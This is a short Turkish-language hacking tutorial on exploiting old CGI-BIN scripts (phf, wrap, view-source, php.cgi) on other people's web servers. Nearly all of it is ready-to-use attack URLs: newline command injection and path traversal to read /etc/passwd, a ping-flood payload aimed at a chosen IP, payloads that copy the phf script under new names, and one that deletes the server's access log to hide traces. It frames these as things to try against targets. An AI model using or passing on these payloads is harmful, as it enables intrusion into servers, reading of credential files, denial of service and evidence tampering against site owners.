Sitelerin CGI/BIN Açıklarını Bulmak

a- (Phf scripti): 

Pek çok web ana bilgisayarı CGI-BIN güvenliğinden yoksundur. Bir de bunun üzerine sistem yöneticilerinin CGI-BIN güvenlik açıklarını bilmemesi potansiyel sistem açıklarına yol açmaktadır. Tüm dünyada pek çok hacker'in kullandığı cgi-bin güvenlik açığı:


http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0acat%20/etc/passwd

Fakat bazı uyanık sistem yöneticileri phf komutunun kullanımını sınırlamışlardır. Bu yüzden bu komutu çalıştıramayabilirsiniz. Fakat yine de alternatif web makineleri üzerinde denemekte yarar var.

b- (Wrap Scripti): 

Irix işletim sisteminin 6.2 versiyonunda rastlanan bu hatayı da söyle istismar edebiliriz:

• http://www.kiraca?imizadres.com.tr/cgi-bin/wrap?../../../etc/passwd
• http://www.kiraca?imizadres.com.tr/cgi-bin/wrap?%0als (...)

Dikkat edeceğimiz tek nokta bu hata sadece IRIX 6.2'de var. !!

c- (View Source Scripti): 

Denemek serbest (başarıya ulaşabilme ihtimali kadar ulaşamama ihtimali de var)

http://www.kiraca?imizadres.com.tr/cgi-bin/view-source?../../../etc/passwd

ya da

http://www.kiraca?imizadres.com.tr/cgi-bin/view-source?%1b or

%0a %20

d- (php.cgi Scripti):
http://www.victim.com/cgi-bin/php.cgi?../../../etc/passwd

e- Diğer Denenebilir Scriptler:

• http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0aping%20-c%201000%20-s
• %205000%20ip%20to%20shoot
• http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20fhp
• http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20.blah
• http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0als%20-al%20/dir/to/go
• http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0amkdir%20/www/dirtocreate
• http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0arm%20../logs/access_log